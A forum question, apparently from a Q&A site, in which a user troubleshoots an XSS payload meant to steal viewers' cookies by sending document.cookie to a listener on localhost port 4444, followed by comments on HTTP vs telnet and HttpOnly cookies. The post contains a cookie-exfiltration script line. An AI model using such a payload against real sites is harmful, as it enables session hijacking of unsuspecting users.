# XSS script syntax problem

Tags: xss, javascript, cookies, csrf

I have a server running on port `4444` on `localhost` that just echoes messages it receives.

I have a JS script embedded in a message that is supposed to send the cookies of whoever looks at it.

Here is the script:

```
     <script>document.write("<img src=http://127.0.0.1:4444?c=" 
+ escape(document.cookie) + " >"); </script>
```

However, this does not send the cookie information to the server. Nothing is echoed back or printed out on the server side. I know the server is running normally because executing `telnet localhost 4444` and typing a message echoes the message back.

Is something wrong with my script?

Comment: Are you loading that script on the machine that is hosting the web server? Because you aren't sending the cookies to "the server", you're sending them to "TCP port 4444 on the computer that runs the script" and those might not be the same thing...

Comment: What kind of server are you running? Telnet is not the same as http. And XSS happens in a web browser, not on the server. I think you need to learn more about Web server technology before trying to learn about XSS.

Comment: If the cookie is HttpOnly, you can't grab it this way. Furthermore, document.cookie only supplies cookies for the domain and path to which the cookie is configured. Did you set some cookies first?